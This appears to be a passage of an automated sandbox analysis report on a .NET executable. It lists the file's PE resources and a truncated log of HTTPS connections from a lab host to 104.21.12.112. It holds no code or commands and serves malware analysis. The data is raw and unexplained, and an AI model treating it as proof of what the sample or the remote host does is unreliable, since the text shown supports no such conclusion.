                                          RT_CURSOR0x4406700x134Targa image data 64 x 65536 x 1 +32 "\001"0.2987012987012987
                                          RT_CURSOR0x4407a40x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.275974025974026
                                          RT_CURSOR0x4408d80x134Targa image data 64 x 65536 x 1 +32 "\001"0.2305194805194805
                                          RT_CURSOR0x440a0c0x134Targa image data 64 x 65536 x 1 +32 "\001"0.19805194805194806
                                          RT_CURSOR0x440b400x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                          RT_CURSOR0x440c740x134data0.4642857142857143
                                          RT_CURSOR0x440da80x134data0.4805194805194805
                                          RT_CURSOR0x440edc0x134data0.38311688311688313
                                          RT_CURSOR0x4410100x134data0.36038961038961037
                                          RT_CURSOR0x4411440x134data0.4090909090909091
                                          RT_CURSOR0x4412780x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                          RT_BITMAP0x4413ac0x70Device independent bitmap graphic, 16 x 16 x 1, image size 640.5
                                          RT_BITMAP0x44141c0x70Device independent bitmap graphic, 16 x 16 x 1, image size 640.36607142857142855
                                          RT_BITMAP0x44148c0x4cDevice independent bitmap graphic, 4 x 7 x 1, image size 280.5394736842105263
                                          RT_BITMAP0x4414d80x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m0.6745049504950495
                                          RT_BITMAP0x4418000x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m0.4962871287128713
                                          RT_BITMAP0x441b280x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m0.6658415841584159
                                          RT_BITMAP0x441e500x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m0.4839108910891089
                                          RT_BITMAP0x4421780x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.34011627906976744
                                          RT_BITMAP0x4422d00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2441860465116279
                                          RT_BITMAP0x4424280x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.32848837209302323
                                          RT_BITMAP0x4425800x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.25
                                          RT_BITMAP0x4426d80x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m0.22277227722772278
                                          RT_BITMAP0x442a000x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m0.18193069306930693
                                          RT_BITMAP0x442d280x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m0.10148514851485149
                                          RT_BITMAP0x4430500x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m0.0655940594059406
                                          RT_BITMAP0x4433780x508Device independent bitmap graphic, 14 x 14 x 8, image size 224, resolution 3779 x 3779 px/m, 256 important colors0.5419254658385093
                                          RT_BITMAP0x4438800x508Device independent bitmap graphic, 14 x 14 x 8, image size 224, resolution 3779 x 3779 px/m, 256 important colors0.5403726708074534
                                          RT_BITMAP0x443d880x508Device independent bitmap graphic, 14 x 14 x 8, image size 224, resolution 3779 x 3779 px/m, 256 important colors0.5023291925465838
                                          RT_BITMAP0x4442900xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.44396551724137934
                                          RT_BITMAP0x4443780x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2851 x 2851 px/m, 256 important colors0.15227272727272728
                                          RT_BITMAP0x4448a00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2851 x 2851 px/m, 256 important colors0.8234848484848485
                                          RT_BITMAP0x444dc80x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.40606060606060607
                                          RT_BITMAP0x4452f00x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.41439393939393937
                                          RT_BITMAP0x4458180xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.43103448275862066
                                          RT_BITMAP0x4459000xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.38362068965517243
                                          RT_BITMAP0x4459e80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4224137931034483
                                          RT_BITMAP0x445ad00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4353448275862069
                                          RT_BITMAP0x445bb80x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.453030303030303
                                          RT_BITMAP0x4460e00x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.4356060606060606
                                          RT_BITMAP0x4466080x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.40984848484848485
                                          RT_BITMAP0x446b300x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.403030303030303
                                          RT_BITMAP0x4470580x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors0.5197368421052632
                                          RT_BITMAP0x4470f00x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors0.506578947368421
                                          RT_BITMAP0x4471880x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 132, resolution 3779 x 3779 px/m, 256 important colors0.11454849498327759
                                          RT_BITMAP0x4476340x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.12623762376237624
                                          RT_BITMAP0x44795c0x828Device independent bitmap graphic, 32 x 32 x 8, image size 10240.25191570881226055
                                          RT_BITMAP0x4481840x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.12376237623762376
                                          RT_BITMAP0x4484ac0x4b8Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 3779 x 3779 px/m, 256 important colors0.11754966887417219
                                          RT_BITMAP0x4489640x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 132, resolution 3779 x 3779 px/m, 256 important colors0.07608695652173914
                                          RT_BITMAP0x448e100x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.12871287128712872
                                          RT_BITMAP0x4491380x828Device independent bitmap graphic, 32 x 32 x 8, image size 10240.25383141762452105
                                          RT_BITMAP0x4499600x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.125
                                          RT_BITMAP0x449c880x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.13242574257425743
                                          RT_BITMAP0x449fb00x828Device independent bitmap graphic, 32 x 32 x 8, image size 10240.2514367816091954
                                          RT_BITMAP0x44a7d80x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.12376237623762376
                                          RT_BITMAP0x44ab000x828Device independent bitmap graphic, 32 x 32 x 8, image size 10240.3227969348659004
                                          RT_BITMAP0x44b3280x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.4628787878787879
                                          RT_BITMAP0x44b8500x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, 256 important colors0.32954545454545453
                                          RT_BITMAP0x44bd780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                          RT_BITMAP0x44bf480x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                          RT_BITMAP0x44c12c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                          RT_BITMAP0x44c2fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                          RT_BITMAP0x44c4cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                          RT_BITMAP0x44c69c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                          RT_BITMAP0x44c86c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                          RT_BITMAP0x44ca3c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                          RT_BITMAP0x44cc0c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                          RT_BITMAP0x44cddc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                          RT_BITMAP0x44cfac0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5208333333333334
                                          RT_BITMAP0x44d06c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42857142857142855
                                          RT_BITMAP0x44d14c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.4955357142857143
                                          RT_BITMAP0x44d22c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.40865384615384615
                                          RT_BITMAP0x44d2fc0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.4326923076923077
                                          RT_BITMAP0x44d3cc0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.3125
                                          RT_BITMAP0x44d49c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.3173076923076923
                                          RT_BITMAP0x44d56c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.38461538461538464
                                          RT_BITMAP0x44d63c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.3942307692307692
                                          RT_BITMAP0x44d70c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.40384615384615385
                                          RT_BITMAP0x44d7dc0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.40865384615384615
                                          RT_BITMAP0x44d8ac0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.3317307692307692
                                          RT_BITMAP0x44d97c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.34615384615384615
                                          RT_BITMAP0x44da4c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.39903846153846156
                                          RT_BITMAP0x44db1c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.39903846153846156
                                          RT_BITMAP0x44dbec0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.3701923076923077
                                          RT_BITMAP0x44dcbc0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.375
                                          RT_BITMAP0x44dd8c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.40865384615384615
                                          RT_BITMAP0x44de5c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.4423076923076923
                                          RT_BITMAP0x44df2c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.3798076923076923
                                          RT_BITMAP0x44dffc0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.375
                                          RT_BITMAP0x44e0cc0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.4567307692307692
                                          RT_BITMAP0x44e19c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.4375
                                          RT_BITMAP0x44e26c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3706896551724138
                                          RT_BITMAP0x44e3540xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.375
                                          RT_BITMAP0x44e43c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.28448275862068967
                                          RT_BITMAP0x44e5240xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.28448275862068967
                                          RT_BITMAP0x44e60c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.33189655172413796
                                          RT_BITMAP0x44e6f40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.34051724137931033
                                          RT_BITMAP0x44e7dc0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.36637931034482757
                                          RT_BITMAP0x44e8c40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.36637931034482757
                                          RT_BITMAP0x44e9ac0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3103448275862069
                                          RT_BITMAP0x44ea940xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3103448275862069
                                          RT_BITMAP0x44eb7c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3620689655172414
                                          RT_BITMAP0x44ec640xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.35344827586206895
                                          RT_BITMAP0x44ed4c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.33620689655172414
                                          RT_BITMAP0x44ee340xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.33620689655172414
                                          RT_BITMAP0x44ef1c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3577586206896552
                                          RT_BITMAP0x44f0040xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3620689655172414
                                          RT_BITMAP0x44f0ec0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.31896551724137934
                                          RT_BITMAP0x44f1d40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.31896551724137934
                                          RT_BITMAP0x44f2bc0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.41379310344827586
                                          RT_BITMAP0x44f3a40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors0.3922413793103448
                                          RT_BITMAP0x44f48c0x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.36666666666666664
                                          RT_BITMAP0x44f9b40xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.38392857142857145
                                          RT_BITMAP0x44fa940xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4947916666666667
                                          RT_BITMAP0x44fb540xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.484375
                                          RT_BITMAP0x44fc140x208Device independent bitmap graphic, 26 x 26 x 4, image size 4160.29615384615384616
                                          RT_BITMAP0x44fe1c0x208Device independent bitmap graphic, 26 x 26 x 4, image size 4160.29423076923076924
                                          RT_BITMAP0x4500240x208Device independent bitmap graphic, 26 x 26 x 4, image size 4160.2846153846153846
                                          RT_BITMAP0x45022c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42410714285714285
                                          RT_BITMAP0x45030c0x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors0.045454545454545456
                                          RT_BITMAP0x4508340x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors0.15606060606060607
                                          RT_BITMAP0x450d5c0x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors0.045454545454545456
                                          RT_BITMAP0x4512840x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors0.07045454545454545
                                          RT_BITMAP0x4517ac0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5104166666666666
                                          RT_BITMAP0x45186c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.5
                                          RT_BITMAP0x45194c0x494Device independent bitmap graphic, 9 x 9 x 8, image size 1080.4257679180887372
                                          RT_BITMAP0x451de00x494Device independent bitmap graphic, 9 x 9 x 8, image size 1080.4249146757679181
                                          RT_BITMAP0x4522740xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                          RT_BITMAP0x45235c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4895833333333333
                                          RT_BITMAP0x45241c0x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.16890243902439026
                                          RT_BITMAP0x452a840x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.19695121951219513
                                          RT_BITMAP0x4530ec0x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.3176829268292683
                                          RT_BITMAP0x4537540x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.28841463414634144
                                          RT_BITMAP0x453dbc0x668Device independent bitmap graphic, 24 x 24 x 8, image size 5760.32865853658536587
                                          RT_BITMAP0x4544240x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.21707317073170732
                                          RT_BITMAP0x454a8c0x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.2548780487804878
                                          RT_BITMAP0x4550f40x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 3779 x 3779 px/m, 256 important colors0.3981707317073171
                                          RT_BITMAP0x45575c0x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.2939024390243902
                                          RT_BITMAP0x455dc40x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 1728, resolution 2834 x 2834 px/m0.22002262443438914
                                          RT_BITMAP0x4564ac0x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors0.21402439024390243
                                          RT_BITMAP0x456b140x668Device independent bitmap graphic, 24 x 24 x 8, image size 5760.3280487804878049
                                          RT_BITMAP0x45717c0x188Device independent bitmap graphic, 24 x 24 x 4, image size 2880.5153061224489796
                                          RT_BITMAP0x4573040x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 1728, resolution 2834 x 2834 px/m0.22002262443438914
                                          RT_BITMAP0x4579ec0x188Device independent bitmap graphic, 24 x 24 x 4, image size 2880.39540816326530615
                                          RT_BITMAP0x457b740x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m0.5678571428571428
                                          RT_BITMAP0x457da40x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m0.5928571428571429
                                          RT_BITMAP0x457fd40x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m0.5392857142857143
                                          RT_BITMAP0x4582040x230Device independent bitmap graphic, 13 x 13 x 24, image size 5200.29285714285714287
                                          RT_BITMAP0x4584340x230Device independent bitmap graphic, 13 x 13 x 24, image size 5200.2732142857142857
                                          RT_BITMAP0x4586640x230Device independent bitmap graphic, 13 x 13 x 24, image size 5200.2714285714285714
                                          RT_BITMAP0x4588940x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m0.44642857142857145
                                          RT_BITMAP0x458ac40x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m0.4589285714285714
                                          RT_BITMAP0x458cf40x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m0.45714285714285713
                                          RT_BITMAP0x458f240x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.4068181818181818
                                          RT_BITMAP0x45944c0x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6918316831683168
                                          RT_BITMAP0x4597740x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6089108910891089
                                          RT_BITMAP0x459a9c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.3922413793103448
                                          RT_BITMAP0x459b840xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.45689655172413796
                                          RT_BITMAP0x459c6c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.5689655172413793
                                          RT_BITMAP0x459d540xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.49137931034482757
                                          RT_BITMAP0x459e3c0x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.8254950495049505
                                          RT_BITMAP0x45a1640xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.5689655172413793
                                          RT_BITMAP0x45a24c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.46551724137931033
                                          RT_BITMAP0x45a3340x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6695544554455446
                                          RT_BITMAP0x45a65c0xc028Device independent bitmap graphic, 128 x 128 x 24, image size 491520.7487599609692633
                                          RT_BITMAP0x4666840x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.676980198019802
                                          RT_BITMAP0x4669ac0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.5517241379310345
                                          RT_BITMAP0x466a940xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.3794642857142857
                                          RT_BITMAP0x466b740x124Device independent bitmap graphic, 9 x 9 x 24, image size 252, resolution 3779 x 3779 px/m0.5993150684931506
                                          RT_BITMAP0x466c980x124Device independent bitmap graphic, 9 x 9 x 24, image size 252, resolution 3779 x 3779 px/m0.5924657534246576
                                          RT_ICON0x466dbc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.3696060037523452
                                          RT_ICON0x467e640x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.27728215767634856
                                          RT_ICON0x46a40c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.22626358053849788
                                          RT_ICON0x46e6340x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.14613155092866437
                                          RT_ICON0x47ee5c0x6226PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9980100294515641
                                          RT_STRING0x4850840xbedata0.5052631578947369
                                          RT_GROUP_CURSOR0x4851440x14Lotus unknown worksheet or configuration, revision 0x11.25
                                          RT_GROUP_CURSOR0x4851580x14data1.3
                                          RT_GROUP_CURSOR0x48516c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851800x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851940x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851a80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851bc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851d00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851e40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4851f80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x48520c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852200x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852340x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852480x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x48525c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852700x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852840x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852980x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852ac0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852c00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852d40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852e80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_CURSOR0x4852fc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                          RT_GROUP_ICON0x4853100x4cdata0.7894736842105263
                                          RT_VERSION0x48535c0x3c0data0.3854166666666667
                                          RT_MANIFEST0x48571c0x5a1XML 1.0 document, ASCII text, with CRLF line terminators0.4059680777238029
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampSource PortDest PortSource IPDest IP
                                          May 24, 2024 10:25:57.880947113 CEST49675443192.168.2.523.1.237.91
                                          May 24, 2024 10:25:57.880947113 CEST49674443192.168.2.523.1.237.91
                                          May 24, 2024 10:25:57.974555016 CEST49673443192.168.2.523.1.237.91
                                          May 24, 2024 10:26:01.052772045 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.052862883 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:01.052956104 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.054059029 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.054089069 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:01.542809010 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:01.542891979 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.546699047 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.546709061 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:01.547198057 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:01.599438906 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.746870041 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.746952057 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:01.747209072 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.139014959 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.139245033 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.139314890 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.144013882 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.144054890 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.144076109 CEST49706443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.144084930 CEST44349706104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.162794113 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.162853956 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.162924051 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.163820028 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.163849115 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.735603094 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.735701084 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.738573074 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.738625050 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.739008904 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:02.740928888 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.740928888 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:02.741045952 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.484296083 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.488590956 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.488636971 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.488665104 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.488698006 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.488753080 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.497073889 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.508270979 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.508321047 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.508335114 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.508351088 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.508418083 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.513823986 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.513890982 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.513946056 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.513959885 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.518505096 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.518559933 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.518573999 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.518588066 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.518647909 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.518660069 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.518682957 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.518733025 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.518934965 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.518974066 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.519001007 CEST49707443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.519013882 CEST44349707104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.561394930 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.561465025 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:03.561573029 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.561971903 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:03.562001944 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:04.095675945 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:04.095781088 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:04.097827911 CEST49708443192.168.2.5104.21.12.112
